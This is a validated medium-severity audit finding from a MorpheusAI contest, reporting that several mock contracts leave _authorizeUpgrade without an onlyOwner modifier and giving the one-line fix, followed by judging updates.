MorpheusAI
MorpheusAI
Foundry
22,500 USDC
View results
Previous Next
Submission Details
Severity: medium
Valid

Multiple Mocks do not have access control modifier on function `_authorizeUpgrade`

denzi

Summary

Contracts L1SenderV2.sol, L2MessageReceiver.sol, L2TokenReceiverV2.sol, DistributionV2.sol do not implement onlyOwner on _authorizeUpgrade.

Contracts which use UUPSUpgradeable should always override the _authorizeUpgrade function and add access control modifier such as onlyOwner.

Vulnerability Details

The _authorizeUpgrade function is required to be over-ridden and assigned an access modifier such as onlyOnwer so no unauthorized user can pass in their own address for a malicious implementation of a contract.

openzeppelin docs provide clear instructions on how to implement UUPSUpgradeable here
https://docs.openzeppelin.com/contracts/4.x/api/proxy#UUPSUpgradeable-_authorizeUpgrade-address-

Impact

Failure to provide the onlyOwner access modifier on _authorizeUpgrade functions allow any one to call the function and assign any malicious implementation of the contract.

Tools Used

Manual Review

Recommendations

Consider following the docs provided by OpenZeppelin and add access control modifier such as onlyOwner on all instances of _authorizeUpgrade.

- function _authorizeUpgrade(address) internal view override {}
+ function _authorizeUpgrade(address) internal view override onlyOwner {}
Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

_authorizeUpgrade(address) lacks access control in mock contracts

nmirchev8 Auditor
over 1 year ago
matejdb Auditor
over 1 year ago
0xdemon Auditor
over 1 year ago
inallhonesty Lead Judge
over 1 year ago
inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

_authorizeUpgrade(address) lacks access control in mock contracts

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.